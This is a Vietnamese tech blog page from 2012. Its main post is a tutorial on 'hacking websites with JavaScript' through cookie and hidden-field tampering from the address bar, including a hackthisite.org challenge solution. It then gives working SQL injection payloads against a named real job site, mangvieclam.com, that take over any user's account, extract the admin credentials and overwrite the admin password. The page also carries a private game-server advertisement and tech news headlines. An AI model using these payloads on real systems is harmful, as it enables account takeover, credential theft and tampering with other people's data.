Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Tuesday, August 14, 2012
Kinh hoàng trước cảnh làm pin điện thoại rởm
Giỡn chơi một tí: với hack website = javascript
VÔ VẤN ĐỀ
Đầu tiên bạn mở trang web victim lên !
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad
(Và trên đây là minh chứng microsoft bị phá hủy trong nháy mắt)
Hiiiii anh em làm xong đừng nóng
cái này chỉ dành cho mấy mem yếu tim thôi. hi hi
[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^
Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:
Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
...
var a=unescape("%43%4f%44%45%5a");
function check(){if (document.a.c.value == a){document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";}else{alert ("wrong! - letter size?");}}}
Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
javascript:alert(unescape(a)) để lấy password của level tiếp theo("CODEZ")
Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:
Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
javascript:void(document.write('< name="the_" ="movemoney.php" method="post"><value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" =""><value="Move Money To A Different Account" ="submit">')) Đoạn JavaScript trên sẽ tạo một form với trường ẩn
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
Ấn nút "Move Money To A Different Account" một cái là xong.
Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.
Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
http://www.mangvieclam.com/.
Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.
Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"
Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".
Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai
Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'
LINK :http://www.mangvieclam.com/
do lỗi lập trình.
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:
Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))
Tên đăng nhâp của admin là 'ngtuan'
Tương tự mình lấy password của admin bằng
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--")) Bây giờ mình đặt lại password mới là 'hacked'
<form action=http://www.mangvieclam.com/log.asp method=post>username: <input type=text name=username><br>password: <input type=password name=password><br><input type=hidden name=ChoseLogin value=3><input type=hidden name=mod value=1><input type=submit value=login></form>
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
<---------THE END----------->
Chúc các bạn thành công. Nên nhớ rằng dùng để học hỏi không nên lấy để đi phá các bạn có thể tạo stile trên free host và áp dụng xem sao
Sunday, August 12, 2012
MU Radiance SS1 free, dễ chơi 70 rs = 50k credits
Đăng ký: http://radiancemu.com/main.php?op=register
Download: http://radiancemu.com/main.php?op=downloads
Server: RadianceMu Easy
Server is From: Bulgaria
Version: 97d+99i
Experience: 99999x
Drops: 99%
Bless Bug: ON
Reset Lvl: 330/1000
Max Level: 1000
Reset Zen: 1 mil
Reset Points: Keep STATS!
Bonus for Reset Points: 5000 (reset from game) comands /reset
Comands: /add stats max 10 000
Points Per Level: 90/100
Box+1,2,3,4,5 Shop Lorencia !
Wings 1 & 2 Level in Shop !
Maximum Stats: 32767
Max Resets: 1000
Max Grand Resets: 100
Clear Inventory: No
Clear Skills: No
Clear Stats: No
- :: Custom Commands :: -
To use skin you need to be 50 reset's and have 50 credits!!
/grandreset - 70 reset = 5000 bonus credits
/evo - 150 level dark knight = blade knight(more easy)
Hot!!!
/post - global message
/addstr - add stats in game
/addagi - add stats in game
/addvit - add stats in game
/addene - add stats in game
/pkclear - clear pk
/reset - 330 lvl, keep stats, 5000 bonus points
/marry - You can get married for a player in the game!
Coordinates:
Davias church
Husband - 209 16
Wife - 210 16
How to use it?
Go to specified coordinates
Husband must type: /marry wife's name
Wife must type: /accept
Marry commands and other:
/tracemarry - find your wife/husband
/marrystatus - online/offline
/getmarry - see for who you are married
/divorce - divorce
/time - see the time and date
/exit - force exit
/buy - buy set or something else
To use /buy you need to 1lvl 1 zen
/sell - sell set or something else
To use /sell you need to be 1lvl 1 zen
/online - online players
/clearinventory - clear inventory
Move Comands:
/move stadium - Stadium Arena
/move neli - Arena stadion
/move davias4
/move atlans
/move atlans2
/move atlans3
/move noria
/move tarkan2
/move dungeon
/move dungeon2
/move dungeon3
/move losttower
/move losttower2
/move losttower3
/move losttower4
/move losttower5
/move losttower6
/move losttower7
/move icarus = go icarus
/move icarus2 = go icarus2
- :: Custom Events :: -
Happy Hour
Party Exp Bonus
- :: Security :: -
Anti Disconnect Hack
Anti Guild Crash
Anti Vault Dupe
- Vote System - Vote for Us and Get Rewarded!
- 24/7 Online Dedicated Server hosted in Bulgaria, Varna.
RadianceMU SERVER
Những triệu chứng khi cơ thể đang mất nước
Tuần qua, Facebook có gì đáng chú ý?
-CEO Netflix mua 1 triệu USD cổ phiếu Facebook.
-Facebook đối phó với những cú click gian lận như thế nào?
-Nhân viên Facebook là chủ nhân của Boo - chú chó "cute" nhất thế giới.
-Dự án của Facebook Hackathon cho phép chuyển đổi ảnh Instagram thành bưu thiếp.
Hoàn thành thỏa thuận về bảo mật